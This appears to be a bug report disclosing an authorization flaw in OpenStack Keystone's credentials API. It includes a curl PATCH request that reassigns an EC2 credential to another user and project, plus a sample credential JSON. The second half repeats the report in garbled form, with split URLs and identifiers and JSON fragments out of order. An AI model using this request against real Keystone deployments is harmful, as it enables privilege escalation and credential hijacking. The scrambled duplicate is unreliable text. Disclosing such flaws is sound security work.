"_build_target_enforcement" function checks only for "credential_id": https://github.com/openstack/keystone/blob/7bb6314e40d6947294260324e84a58de191f8609/keystone/api/credentials.py#L38
Thus even having a '"identity:update_credential": "rule:cloud_admin or (user_id:%(target.credential.user_id)s)"' policy doesn't prevent a malicious user to create an EC2 credential, then change its owner and project ID, e.g.:
curl -X PATCH https://keystone/v3/credentials/3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{ "credential": { "project_id": "_target_project_id_", "user_id": "_target_user_id_" } }'
Additionally it is possible to Create a credential with any existing project_id, though it doesn't have a serious security issue, e.g.:
{ "credential": { "blob": "{\"access\": \"ffe6fc21b47c4d87befc95ad070c3b7a\", \"secret\": \"530196cd097e4a7ca9df7258aa89ff0e\", \"trust_id\": null}", "id": "3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f", "project_id": "_any_project_id_", "type": "ec2", "user_id": "_my_user_id_" } }
"_build_ target_ enforcement" function checks only for "credential_id": https:/ /github. com/openstack/ keystone/ blob/7bb6314e40 d6947294260324e 84a58de191f8609 /keystone/ api/credentials .py#L38
Thus even having a '"identity: update_ credential" : "rule:cloud_admin or (user_id: %(target. credential. user_id) s)"' policy doesn't prevent a malicious user to create an EC2 credential, then change its owner and project ID, e.g.:
curl -X PATCH https:/ /keystone/ v3/credentials/ 3c2b3265350c6da 3a18a143fbe975c a4a8ed88a6f8c6d acc2494a5c1287b a66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{ project_ id_",
"credential": {
"project_id": "_target_
"user_id": "_target_user_id_"
}
}'
Additionally it is possible to Create a credential with any existing project_id, though it doesn't have a serious security issue, e.g.:
{ d87befc95ad070c 3b7a\", \"secret\": \"530196cd097e4 a7ca9df7258aa89 ff0e\", \"trust_id\": null}", a3a18a143fbe975 ca4a8ed88a6f8c6 dacc2494a5c1287 ba66f",
"credential": {
"blob": "{\"access\": \"ffe6fc21b47c4
"id": "3c2b3265350c6d
"project_id": "_any_project_id_",
"type": "ec2",
"user_id": "_my_user_id_"
}
}